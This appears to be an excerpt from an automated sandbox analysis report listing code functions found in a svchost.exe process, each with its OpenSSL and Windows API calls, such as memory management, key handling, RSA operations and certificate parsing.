    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA0AD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,46_2_00007FFA2CE44CB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE88CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,46_2_00007FFA2CE88CA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,46_2_00007FFA2CE28C60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22C60 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE22C60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEACC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEACC60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,46_2_00007FFA2CE6AC50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE3ABF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE725B0 OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE725B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE545A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE545A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE325A0 CRYPTO_strdup,CRYPTO_free,46_2_00007FFA2CE325A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEAC5A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE48580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE48580
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,46_2_00007FFA2CE5E510
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CEA2500
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE324D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,46_2_00007FFA2CE324D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE6E660
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44660 CRYPTO_free,CRYPTO_malloc,memcpy,46_2_00007FFA2CE44660
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72630 OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE72630
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE92630
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE3C610
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A5C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE827B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE827B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E790 CRYPTO_free,46_2_00007FFA2CE7E790
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE70770 CRYPTO_clear_free,CRYPTO_free,46_2_00007FFA2CE70770
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE72740
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E730 CRYPTO_free,46_2_00007FFA2CE7E730
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE28720
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6C700 CRYPTO_malloc,memcmp,memcpy,memcpy,46_2_00007FFA2CE6C700
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE2E700
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7E6D0 CRYPTO_malloc,46_2_00007FFA2CE7E6D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CE4A8B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE668B0 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE668B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEAA8B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEAC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,46_2_00007FFA2CEAC890
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2E880 CRYPTO_THREAD_run_once,46_2_00007FFA2CE2E880
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92880 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE92880
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22860 CRYPTO_zalloc,InitializeCriticalSection,46_2_00007FFA2CE22860
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7A850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE78850 CRYPTO_realloc,46_2_00007FFA2CE78850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44840
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E810 CRYPTO_zalloc,46_2_00007FFA2CE6E810
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,46_2_00007FFA2CE28812
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE74800 OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE74800
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE227F0 DeleteCriticalSection,CRYPTO_free,46_2_00007FFA2CE227F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9C7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,46_2_00007FFA2CE9C7E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE707D0 CRYPTO_malloc,memcpy,CRYPTO_free,46_2_00007FFA2CE707D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A7D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE767D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,46_2_00007FFA2CE767D1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE741B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,46_2_00007FFA2CE741B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE36190 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE36190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE8C190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CEA6190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE78160 CRYPTO_memdup,46_2_00007FFA2CE78160
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44160
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE48140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE48140
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE70130 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE70130
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE30130 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE30130
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE68120 CRYPTO_free,46_2_00007FFA2CE68120
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44120 CRYPTO_set_ex_data,46_2_00007FFA2CE44120
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE540E0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE540E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE340E0 CRYPTO_get_ex_data,46_2_00007FFA2CE340E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6C0D0 CRYPTO_free,46_2_00007FFA2CE6C0D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE302B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,46_2_00007FFA2CE302B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44260
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,46_2_00007FFA2CE3E220
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE621E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,46_2_00007FFA2CE621E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE381E0 CRYPTO_get_ex_data,46_2_00007FFA2CE381E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7A1D0 CRYPTO_realloc,46_2_00007FFA2CE7A1D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44380
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE90340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,46_2_00007FFA2CE90340
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE54330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE54330
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE5A330
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE3A330
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE822F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE822F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA82E7
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,46_2_00007FFA2CE8A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE342D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE342D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE6A2C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4C2C0 CRYPTO_free,46_2_00007FFA2CE4C2C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE262C0 CRYPTO_clear_free,46_2_00007FFA2CE262C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA02C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE44490
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE62470 CRYPTO_zalloc,46_2_00007FFA2CE62470
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,46_2_00007FFA2CE22460
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,46_2_00007FFA2CEA4460
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE40450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,46_2_00007FFA2CE40450
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEA844C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,46_2_00007FFA2CEA8426
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,46_2_00007FFA2CEA8414
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE58400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,46_2_00007FFA2CE58400
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE623F0 CRYPTO_free,46_2_00007FFA2CE623F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE223C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE223C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE25DB0 CRYPTO_malloc,46_2_00007FFA2CE25DB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9BDB0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_is_a,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,46_2_00007FFA2CE9BDB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99DA6 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE99DA6
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE27DA0 CRYPTO_free,46_2_00007FFA2CE27DA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43D70 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,46_2_00007FFA2CE43D70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6BD60 CRYPTO_zalloc,46_2_00007FFA2CE6BD60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE75D30 CRYPTO_free,46_2_00007FFA2CE75D30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE49CC0 EVP_MAC_CTX_free,CRYPTO_free,46_2_00007FFA2CE49CC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE99CC1 EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_CTX_copy_ex,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,46_2_00007FFA2CE99CC1
